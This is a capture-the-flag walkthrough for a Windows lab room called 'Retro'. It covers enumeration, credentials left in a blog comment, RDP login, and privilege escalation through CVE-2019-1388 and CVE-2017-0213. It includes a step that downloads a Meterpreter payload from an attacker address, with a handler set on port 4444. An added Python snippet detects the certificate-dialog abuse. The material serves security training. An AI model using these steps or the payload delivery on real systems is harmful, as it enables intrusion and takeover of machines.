Retro
| Room Info | |
| --- | --- |
| Name | Retro |
| Target IP | 10.10.181.110 |
| Difficulty level | Easy |
| Subscription type | Free |
| OS | Windows |
Perform web server directory enumeration. The enumeration finds a folder named /retro.
Use a browser to navigate to:
http://10.10.181.110/retro/index.php/2019/12/09/ready-player-one/
The user Wade left a comment containing his password.
Use these credentials to log in to the target via the open RDP port 3389:
Wade:parzival
I suggest setting the Remmina RDP resolution to a higher one. Open Remmina, click + to create a Quick RDP Connect, select the resolution and Save as Default.
Open the user.txt file on Wade's desktop to get the first flag.
Open Internet Explorer to initialize it.
Open Google Chrome and set it as the default web browser in Windows.
The bookmarked link refers to the CVE-2019-1388 - Windows Certificate Dialog Elevation of Privilege Vulnerability.
Check the Recycle Bin and restore the hhupd file.
Exploit the privilege escalation vulnerability in the Windows Certificate Dialog box and run cmd with Administrator privileges.
Even after initializing both the IE and Chrome browsers, the opened window might not offer any option for selecting the browser.
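From the defender's side, the certificate-dialog privesc above leaves a recognisable process lineage: a browser started by the UAC consent.exe dialog, followed by cmd.exe started by that browser while running as SYSTEM. The following detection snippet is an added example, not code from the room or this walkthrough; the Sysmon-like Key=Value log format and the sample lines are constructed assumptions.

```python
# Added example, not from the original walkthrough: flag process-creation events
# whose lineage matches the CVE-2019-1388 certificate-dialog abuse above (a browser
# spawned by consent.exe, then cmd.exe spawned by that browser as SYSTEM).
import re

BROWSERS = {"iexplore.exe", "chrome.exe"}
SYSTEM_USER = "NT AUTHORITY\\SYSTEM"

# Constructed sample log (assumed Sysmon-like Key=Value fields, one event per line).
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\consent.exe ParentImage=C:\\Windows\\System32\\svchost.exe User=NT AUTHORITY\\SYSTEM
Image=C:\\Program Files\\Internet Explorer\\iexplore.exe ParentImage=C:\\Windows\\System32\\consent.exe User=NT AUTHORITY\\SYSTEM
Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Program Files\\Internet Explorer\\iexplore.exe User=NT AUTHORITY\\SYSTEM
Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Windows\\explorer.exe User=RETRO\\Wade
Image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe ParentImage=C:\\Windows\\explorer.exe User=RETRO\\Wade
"""

# Values may contain spaces, so a value runs until the next " Key=" or end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

def parse_event(line):
    """Turn one 'Key=Value Key=Value' line into a dict."""
    return dict(FIELD_RE.findall(line))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return why the event is suspicious, or None if it is not."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image in BROWSERS and parent == "consent.exe":
        return "browser launched from UAC consent dialog"
    if image == "cmd.exe" and parent in BROWSERS and event.get("User") == SYSTEM_USER:
        return "cmd.exe spawned by browser as SYSTEM"
    return None

def find_suspicious(log_text):
    """Return (line_number, reason) for every matching event in the log."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        reason = classify(parse_event(line)) if line.strip() else None
        if reason:
            hits.append((n, reason))
    return hits

if __name__ == "__main__":
    for n, reason in find_suspicious(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

On the constructed sample only the two events from the consent.exe chain are reported; a normal cmd.exe or Chrome launched by explorer.exe under the user's own account is ignored.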
Generate a manual payload to get a Metasploit Meterpreter session on the target.
Download the payload in the target's browser from this link:
http://10.18.65.48/unprivileged-payload.exe
Open Metasploit and set up a handler to listen on port 4444.
Run the unprivileged-payload.exe file on the target machine.
Get systeminfo from the target and save the output to a file.
Exploit the CVE-2017-0213 - Windows COM Elevation of Privilege Vulnerability
Download the CVE-2017-0213_x64.zip package, unzip it and upload CVE-2017-0213_x86.exe to the target.
Run the CVE-2017-0213_x86.exe file from the Meterpreter session or via the RDP connection on the target.
Check the CMD as Administrator session on the target.
Read the root.txt file.
Remember that there can be other attack vectors to exploit the target's vulnerabilities.